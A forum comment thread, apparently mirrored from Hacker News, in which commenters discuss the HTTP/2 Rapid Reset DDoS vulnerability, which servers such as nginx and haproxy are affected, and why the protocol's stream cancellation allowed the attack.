Readit News logoReadit News
dang · 2 years ago
Related ongoing threads:

The largest DDoS attack to date, peaking above 398M rps - https://news.ycombinator.com/item?id=37831062

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks - https://news.ycombinator.com/item?id=37830998

comice · 2 years ago
Nice to see that the haproxy people had spotted this kind of issue with http/2 and apparently mitigated it back in 2018: https://www.mail-archive.com/haproxy@formilux.org/msg44134.h...
jabart · 2 years ago
Nice, I was looking for this type of information for haproxy. Gives me a lot of confidence in their new QUIC feature.
vdfs · 2 years ago
If anyone is curios, Nginx is vulnerable to this

https://www.nginx.com/blog/http-2-rapid-reset-attack-impacti...

obituary_latte · 2 years ago
IF configured away from the defaults:

By relying on the default keepalive limit, NGINX prevents this type of attack. Creating additional connections to circumvent this limit exposes bad actors via standard layer 4 monitoring and alerting tools.

However, if NGINX is configured with a keepalive that is substantially higher than the default and recommended setting, the attack may deplete system resources.

js2 · 2 years ago
> In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.

I'm surprised this wasn't foreseen when HTTP/2 was designed. Amplification attacks were already well known from other protocols.

I'm similarly similarly surprised it took this long for this attack to surface, but maybe HTTP/2 wasn't widely enough deployed to be a worthwhile target till recently?

tptacek · 2 years ago
It's not really an amplification attack. It's just drastically more efficiently using TCP connections.
callalex · 2 years ago
Isn’t any kind of attack where a little bit of effort from the attacker causes a lot of work for the victim an amplification attack? Or do you only consider it an amplification attack if it is exploiting layer 3?

I tried looking it up and couldn’t find an authoritative answer. Can you recommend a resource that you like for this subject?

js2 · 2 years ago
You're right. I hadn't had my coffee yet and the asymmetric cost reminded me of amplification attacks. I'm still surprised this attack wasn't foreseen though. It just doesn't seem all that clever or original.
gnfargbl · 2 years ago
I was surprised too, but if you look at the timelines then RST_STREAM seems to have been present in early versions of SPDY, and SPDY seems mostly to have been designed around 2009. Attacks like Slowloris were coming out at about the same time, but they weren't well-known.

On the other hand, SYN cookies were introduced in 1996, so there's definitely some historic precedent for attacks in the (victim pays Y, attacker pays X, X<<Y) class.

c0l0 · 2 years ago
If you are working on the successor protocol of HTTP/1.1, and are not aware of Slowloris the moment it hits and every serious httpd implementation out there gets patched to mitigate it, I'd argue you are in the wrong line of work.
kristopolous · 2 years ago
> I'm similarly similarly surprised it took this long for this attack to surface

As with most things like this, probably many hundreds of unimportant people saw it and tried it out.

Trying to do it on Google, with a serious effort, that's the wacky part.

sangnoir · 2 years ago
> Trying to do it on Google, with a serious effort, that's the wacky part

If I were the FBI, I'd be looking at people with recently bought Google puts expiring soon. I can't imagine anyone taking a swing at Google infra "for the lulz". Also in contention: nation-states doing a practice run.

the8472 · 2 years ago
So we needed HTTP2 to deliver ads, trackers and bloated frontend frameworks faster. And now it delivers attacks faster too.
jeroenhd · 2 years ago
HTTP/2 makes the browsing experience of high-latency connections a lot more tolerable. It also makes loading web pages in general faster.

Luckily, HTTP/1.1 still works. You can always enable it in your browser configuration and in your web servers if you don't like the protocol.

tlamponi · 2 years ago
> HTTP/2 makes the browsing experience of high-latency connections a lot more tolerable. It also makes loading web pages in general faster.

HTTP/3 does that in my experience (lots of train rides with spotty onboard Wi-Fi) quite a bit better though. As HTTP/2 is still affected by head-of-line blocking and a single packet loss can block all other streams, even if the lost packet didn't hold data for them.

shepherdjerred · 2 years ago
Are you suggesting that we didn't need HTTP2? What's the real alternative here?
the8472 · 2 years ago
In some alternative history there would have been a push to make http 1.1 pipelining work, trim fat from bloated websites (loading cookie consent banners from a 3rd party domain is a travesty on several levels) and maybe use websockets for tiny API requests. And the prioritization attributes on various resources. Then shoveling everything over ~2 TCP connections would have done the job?
bsder · 2 years ago
SCTP (Stream Control Transmission Protocol) or the equivalent. HTTP is really the wrong layer for things like bonding multiple connections, congestion adjustments, etc.

Unfortunately, most computers only pass TCP and UDP (Windows and middleboxes). So, protocol evolution is a dead end.

Thus you have to piggyback on what computers will let through--so you're stuck with creating an HTTP flavor of TCP.

Etheryte · 2 years ago
Nothing in their comment claims that, there's no need to bring absurd strawmen into the discussion.

Dead Comment

scrpl · 2 years ago
Another reason to keep foundational protocols small. HTTP/2 has been around for more than a decade (including SPDY), and this is a first time this attack type surfaced. I wonder what surprises HTTP/3 and QUIC hide...
cmeacham98 · 2 years ago
DNS is a small protocol and is abused by DDoS actors worldwide for relay attacks.
scrpl · 2 years ago
DNS is from 1983, give it some slack
kiitos · 2 years ago
DNS is an enormous protocol, almost unmeasurably large.
liveoneggs · 2 years ago
QUIC didn't account for amplification attacks in its design and the people complaining about it were initially dismissed.
londons_explore · 2 years ago
HTTP/2 is pretty small.
klabb3 · 2 years ago
“Cancelation” should really be added to the “hard CS problems” list.

Like the others on that list (off by one, cache invalidation etc) it isn’t actually hard-hard, but rather underestimated and overlooked.

I think if we took half the time we spend on creation, constructors, initialization, and spent that design time thinking about destruction, cleanup, teardown, cancelation etc, we’d have a lot fewer bugs, in particular resource exhaustion bugs.

pornel · 2 years ago
I really like Rust's async for its ability to immediately cancel Futures, the entire call stack together, at any await point, without needing cooperation from individual calls.
winternewt · 2 years ago
How is that possible if e.g. an external SQL server needs to be told that the operation should be canceled?
jart · 2 years ago
I know that's true of C libraries. POSIX thread cancelation is one of those things where its mere existence pervades everything in its implications.
fefe23 · 2 years ago
I would like to remind everyone that Google invented HTTP/2.

Now they are telling us a yarn about how they are heroically saving us from the problem they created, but without mentioning the part that they created it.

The nerve of these tech companies! Microsoft has been doing this for decades, too.

gsich · 2 years ago
They tried to solve problems that weren't existant.
arisudesu · 2 years ago
Can anyone can explain what's novel about this attack that isn't plain old requests flood?
jsnell · 2 years ago
It depends on what you think a "request flood" attack is.

With HTTP/1.1 you could send one request per RTT [0]. With HTTP/2 multiplexing you could send 100 requests per RTT. With this attack you can send an indefinite number of requests per RTT.

I'd hope the diagram in this article (disclaimer: I'm a co-author) shows the difference, but maybe you mean yet another form of attack than the above?

[0] Modulo HTTP/1.1 pipelining which can cut out one RTT component, but basically no real clients use HTTP/1.1 pipelining, so its use would be a very crisp signal that it's abusive traffic.

tptacek · 2 years ago
I think for this audience a good clarification is:

* HTTP/1.1: 1 request per RTT per connection

* HTTP/2 multiplexing: 100 requests per RTT per connection

* HTTP/2 rapid reset: indefinite requests per connection

In each case attackers are grinding down a performance limitation they had with previous generations of the attack over HTTP. It is a request flood; the thing people need to keep in mind is that HTTP made these floods annoying to generate.

arisudesu · 2 years ago
By request flood I mean, request flood, as in sending insanely high number of requests per unit of time (second) to the target server to cause exhaustion of its resources.

You're right, with HTTP/1.1 we have single request in-flight (or none in keep-alive state) at any moment. But that doesn't limit number of simultaneous connections from a single IP address. An attacker could use the whole port space of TCP to create 65535 (theoretically) connections to the server and to send requests to them in parallel. This is a lot, too. In pre-HTTP/2 era this could be mitigated by limiting number of connections per IP address.

In HTTP/2 however, we could have multiple parallel connections with multiple parallel requests at any moment, this is by many orders higher than possible with HTTP/1.x. But the preceeding mitigation could be implemented by applying to the number of requests over all connections per IP address.

I guess, this was overlooked in the implementations or in the protocol itself? Or rather, it is more difficult to apply restrictions because of L7 protocol multiplexing because it's entirely in the userspace?

Added: The diagram in the article ("HTTP/2 Rapid Reset attack" figure) doesn't really explain why this is an attack. In my thinking, as soon as the request is reset, the server resources are expected to be freed, thus not causing exhaustion of them. I think this should be possible in modern async servers.

bribroder · 2 years ago
The new technique described avoids the maximum limit on number of requests per second (per client) the attacker can get the server to process. By sending both requests and stream resets within the same single connection, the attacker can send more requests per connection/client than used to be possible, so it is perhaps cheaper as an attack and/or more difficult to stop
arisudesu · 2 years ago
Is is a fundamental HTTP/2 protocol issue or implementations issue? Could this be an issue at all, if a server has strict limits of requests per IP address, regardless of number of connections?